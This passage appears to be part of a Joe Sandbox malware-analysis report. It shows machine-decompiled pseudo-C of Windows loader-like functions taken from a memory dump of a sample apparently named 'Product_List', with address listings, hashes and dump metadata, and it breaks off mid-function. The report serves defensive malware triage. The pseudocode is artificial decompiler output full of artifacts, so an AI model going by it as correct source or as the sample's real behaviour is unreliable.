						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = L01792EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = L01792EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E017658EC(_t240);
									_t221 =  *0x1855cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x1855cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E017A4A2C(0x1856e40, 0x17a4b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E01787D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x1745c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = L0179F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = L0179F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E017E7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L01782400(_t267 + 0x20);
															}
															L01782400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E01792397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E01782280(_t134, 0x1858608);
									__eflags =  *0x1856e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										L0177FFB0(_t198, _t241, 0x1858608);
										__eflags = _t253;
										if(_t253 != 0) {
											L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x1856e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x1858608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E01796B90(_t210,  &_v64);
										_t262 =  *0x1858608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0179E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										L017A97C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E017A006A(0x1858608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x1858608);
												E017AB180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x1856904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x1856e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								L0177FFB0(_t198, _t240, 0x1858608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E017A00C2(0x1858608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                                      0x017920a0
                                                      0x017920a8
                                                      0x017920ad
                                                      0x017920b3
                                                      0x017920b8
                                                      0x017920c2
                                                      0x017920c7
                                                      0x017920cb
                                                      0x017920d2
                                                      0x01792263
                                                      0x01792266
                                                      0x017d5836
                                                      0x017d5836
                                                      0x00000000
                                                      0x0179226c
                                                      0x0179226c
                                                      0x01792270
                                                      0x01792274
                                                      0x017920e2
                                                      0x017920e2
                                                      0x017920e6
                                                      0x017920ee
                                                      0x017d57dc
                                                      0x017d57de
                                                      0x017d57ec
                                                      0x017d57ec
                                                      0x017d57f1
                                                      0x017d57f3
                                                      0x017d57f8
                                                      0x00000000
                                                      0x017d57f8
                                                      0x017d57e0
                                                      0x017d57e4
                                                      0x017d57ea
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x017d57ea
                                                      0x017920f4
                                                      0x017920f4
                                                      0x017920f8
                                                      0x017920f8
                                                      0x017920fc
                                                      0x01792100
                                                      0x01792106
                                                      0x01792201
                                                      0x01792206
                                                      0x0179220b
                                                      0x0179220e
                                                      0x017922a9
                                                      0x017922ac
                                                      0x00000000
                                                      0x00000000
                                                      0x017922b2
                                                      0x017922b5
                                                      0x017d5801
                                                      0x017d5806
                                                      0x00000000
                                                      0x00000000
                                                      0x017d5810
                                                      0x017d5815
                                                      0x017d5818
                                                      0x00000000
                                                      0x00000000
                                                      0x017d581e
                                                      0x017922bb
                                                      0x017922bb
                                                      0x01792218
                                                      0x01792218
                                                      0x0179221c
                                                      0x01792220
                                                      0x01792222
                                                      0x017922c2
                                                      0x017922c4
                                                      0x017922dc
                                                      0x017922dc
                                                      0x017922e1
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x017922e7
                                                      0x017922c8
                                                      0x017922cd
                                                      0x017922d3
                                                      0x017922d6
                                                      0x017d5823
                                                      0x017d5825
                                                      0x017d5827
                                                      0x00000000
                                                      0x00000000
                                                      0x017d582d
                                                      0x00000000
                                                      0x017d582d
                                                      0x00000000
                                                      0x01792228
                                                      0x01792228
                                                      0x00000000
                                                      0x01792228
                                                      0x01792222
                                                      0x01792214
                                                      0x01792214
                                                      0x00000000
                                                      0x01792114
                                                      0x01792114
                                                      0x01792114
                                                      0x0179211a
                                                      0x0179211c
                                                      0x01792348
                                                      0x0179234d
                                                      0x017d5840
                                                      0x017d5845
                                                      0x017d5848
                                                      0x017d584e
                                                      0x017d584e
                                                      0x017d5848
                                                      0x01792353
                                                      0x01792355
                                                      0x01792388
                                                      0x01792388
                                                      0x01792368
                                                      0x0179236a
                                                      0x0179236c
                                                      0x0179238f
                                                      0x00000000
                                                      0x0179236e
                                                      0x0179236e
                                                      0x0179218e
                                                      0x0179218e
                                                      0x01792191
                                                      0x01792195
                                                      0x017d5a03
                                                      0x017d5a06
                                                      0x017d5a0c
                                                      0x017d5a0f
                                                      0x017d5a11
                                                      0x017d5a13
                                                      0x017d5a13
                                                      0x017d5a19
                                                      0x017d5a1f
                                                      0x00000000
                                                      0x0179219b
                                                      0x0179219b
                                                      0x017921a0
                                                      0x01792282
                                                      0x01792284
                                                      0x01792284
                                                      0x01792284
                                                      0x01792284
                                                      0x017921a6
                                                      0x017921a9
                                                      0x017921ac
                                                      0x017921ae
                                                      0x017921b3
                                                      0x0179228b
                                                      0x01792290
                                                      0x01792379
                                                      0x01792296
                                                      0x01792298
                                                      0x01792298
                                                      0x01792290
                                                      0x017921b9
                                                      0x017921be
                                                      0x017922a2
                                                      0x017922a2
                                                      0x017921c4
                                                      0x017921c8
                                                      0x017921cc
                                                      0x017921d0
                                                      0x017921d4
                                                      0x017921de
                                                      0x017921e3
                                                      0x017d5a29
                                                      0x017d5a2c
                                                      0x00000000
                                                      0x00000000
                                                      0x017d5a3b
                                                      0x00000000
                                                      0x017921e9
                                                      0x017921e9
                                                      0x017921e9
                                                      0x017921ee
                                                      0x017921f1
                                                      0x017d5a45
                                                      0x017d5a4b
                                                      0x017d5a52
                                                      0x017d5a58
                                                      0x017d5a5d
                                                      0x017d5a5f
                                                      0x017d5a71
                                                      0x017d5a61
                                                      0x017d5a6a
                                                      0x017d5a6a
                                                      0x017d5a76
                                                      0x017d5a79
                                                      0x017d5a7f
                                                      0x017d5a83
                                                      0x017d5a85
                                                      0x017d5a87
                                                      0x017d5a87
                                                      0x017d5a8c
                                                      0x017d5a91
                                                      0x017d5a97
                                                      0x017d5a9f
                                                      0x017d5aa0
                                                      0x017d5aa1
                                                      0x017d5aa6
                                                      0x017d5aab
                                                      0x017d5ab1
                                                      0x017d5ab3
                                                      0x017d5ab9
                                                      0x017d5aca
                                                      0x017d5ad4
                                                      0x017d5ad4
                                                      0x017d5ade
                                                      0x017d5ade
                                                      0x017d5aab
                                                      0x017d5a79
                                                      0x017d5a52
                                                      0x017921f7
                                                      0x017921f9
                                                      0x017921fe
                                                      0x017921fe
                                                      0x017921e3
                                                      0x01792195
                                                      0x0179236c
                                                      0x01792122
                                                      0x01792122
                                                      0x01792124
                                                      0x01792231
                                                      0x01792236
                                                      0x01792236
                                                      0x01792238
                                                      0x01792238
                                                      0x01792240
                                                      0x01792242
                                                      0x01792244
                                                      0x017d59fc
                                                      0x0179218c
                                                      0x0179218c
                                                      0x00000000
                                                      0x0179218c
                                                      0x0179224a
                                                      0x0179224f
                                                      0x01792256
                                                      0x01792304
                                                      0x01792309
                                                      0x0179230f
                                                      0x0179231e
                                                      0x0179231e
                                                      0x0179231e
                                                      0x01792320
                                                      0x01792325
                                                      0x0179232a
                                                      0x0179232c
                                                      0x0179233e
                                                      0x0179233e
                                                      0x00000000
                                                      0x0179232c
                                                      0x01792311
                                                      0x01792317
                                                      0x0179231a
                                                      0x0179231c
                                                      0x01792380
                                                      0x01792380
                                                      0x01792380
                                                      0x01792384
                                                      0x00000000
                                                      0x00000000
                                                      0x01792386
                                                      0x00000000
                                                      0x0179231c
                                                      0x0179225c
                                                      0x0179225c
                                                      0x00000000
                                                      0x0179225c
                                                      0x0179212a
                                                      0x01792134
                                                      0x01792138
                                                      0x0179213d
                                                      0x017d5858
                                                      0x017d5863
                                                      0x017d5863
                                                      0x017d5867
                                                      0x017d586a
                                                      0x00000000
                                                      0x00000000
                                                      0x017d586c
                                                      0x017d586c
                                                      0x017d5871
                                                      0x017d5875
                                                      0x017d5877
                                                      0x017d5997
                                                      0x017d599c
                                                      0x017d59a1
                                                      0x017d59a7
                                                      0x017d59a7
                                                      0x00000000
                                                      0x017d59a7
                                                      0x017d587d
                                                      0x00000000
                                                      0x017d588b
                                                      0x017d588b
                                                      0x017d5890
                                                      0x017d5892
                                                      0x017d5894
                                                      0x017d5899
                                                      0x017d589b
                                                      0x017d58a0
                                                      0x017d58a0
                                                      0x017d58aa
                                                      0x017d58b2
                                                      0x017d58b6
                                                      0x017d58be
                                                      0x017d58c6
                                                      0x017d58c9
                                                      0x017d590d
                                                      0x017d5917
                                                      0x017d591a
                                                      0x017d591c
                                                      0x017d5920
                                                      0x017d5928
                                                      0x017d592a
                                                      0x017d592c
                                                      0x017d592e
                                                      0x017d592e
                                                      0x017d58cb
                                                      0x017d58cd
                                                      0x017d58d8
                                                      0x017d58e0
                                                      0x017d58f4
                                                      0x017d58fe
                                                      0x017d58fe
                                                      0x017d593a
                                                      0x017d593e
                                                      0x017d5940
                                                      0x017d5942
                                                      0x00000000
                                                      0x017d5944
                                                      0x017d5944
                                                      0x017d5949
                                                      0x017d594e
                                                      0x017d594e
                                                      0x017d5953
                                                      0x017d595b
                                                      0x017d5976
                                                      0x017d5976
                                                      0x017d597a
                                                      0x017d597f
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x017d5981
                                                      0x017d5981
                                                      0x017d5981
                                                      0x017d5983
                                                      0x017d5988
                                                      0x017d598d
                                                      0x017d5991
                                                      0x017d5991
                                                      0x00000000
                                                      0x017d595d
                                                      0x017d595d
                                                      0x017d5963
                                                      0x017d5965
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x017d5967
                                                      0x017d5967
                                                      0x017d596b
                                                      0x017d596d
                                                      0x00000000
                                                      0x00000000
                                                      0x017d596f
                                                      0x017d5971
                                                      0x017d5971
                                                      0x017d5974
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x017d5974
                                                      0x00000000
                                                      0x017d5967
                                                      0x017d595b
                                                      0x017d5942
                                                      0x017d5863
                                                      0x01792143
                                                      0x01792143
                                                      0x01792149
                                                      0x0179214f
                                                      0x017922f1
                                                      0x017922f6
                                                      0x00000000
                                                      0x01792173
                                                      0x01792173
                                                      0x0179217d
                                                      0x01792181
                                                      0x01792186
                                                      0x017d59ae
                                                      0x017d59b2
                                                      0x017d59b5
                                                      0x017d59b7
                                                      0x017d59ba
                                                      0x017d59cd
                                                      0x017d59d1
                                                      0x017d59d5
                                                      0x017d59d9
                                                      0x017d59db
                                                      0x00000000
                                                      0x00000000
                                                      0x017d59dd
                                                      0x017d59dd
                                                      0x017d59e1
                                                      0x017d59e4
                                                      0x017d59e7
                                                      0x017d59ee
                                                      0x017d59ee
                                                      0x017d59f3
                                                      0x017d59f3
                                                      0x00000000
                                                      0x01792186
                                                      0x0179214f
                                                      0x01792106
                                                      0x01792266
                                                      0x017920d8
                                                      0x017920da
                                                      0x017920e0
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7038c16ecd2cb8310d7eaae090da828cc2fc74440a3a3b69bda7488ba9a5cf0e
                                                      • Instruction ID: c56c7edc99586e1f11cd37556ef1aadc01424c296c3872f250216a419e539f84
                                                      • Opcode Fuzzy Hash: 7038c16ecd2cb8310d7eaae090da828cc2fc74440a3a3b69bda7488ba9a5cf0e
                                                      • Instruction Fuzzy Hash: C4F12671608301AFEB26DF2CD44476AFBF1AF85324F05855DE995DB282D734D848CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0177D5E0 Relevance: .4, Instructions: 353COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 87%
                                                      			E0177D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x185d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = L01776600(0x18552d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x1857b9c; // 0x0
							_t281 = L01784620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E017AF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x1857b90; // 0x77d00000
								if(_t384 == 0) {
									_t353 =  *0x1857b8c; // 0x1242a60
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E01782280(_t200, 0x18584d8);
									_t277 =  *0x18585f4; // 0x1242f50
									_t351 =  *0x18585f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x1242ee8
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									L0177FFB0(_t287, _t353, 0x18584d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = L017BCC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = L01776600(0x18552d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E01777926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x185b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E017EE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x1858472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0x185b1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0x185b218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E01782280(_t250, 0x18584d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L017A3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																L0177FFB0(_t293, _t353, 0x18584d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	L017A37F5(_t353, 0);
																}
																L017A0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E01799B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E017902D6(_t174);
																}
																L017877F0( *0x1857b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0179C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L0177EC7F(_t353);
										L017919B8(_t287, 0, _t353, 0);
										_t200 = L0176F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0x185b2f8 |  *0x185b2fc) == 0 || ( *0x185b2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return L017AB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0x185b2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
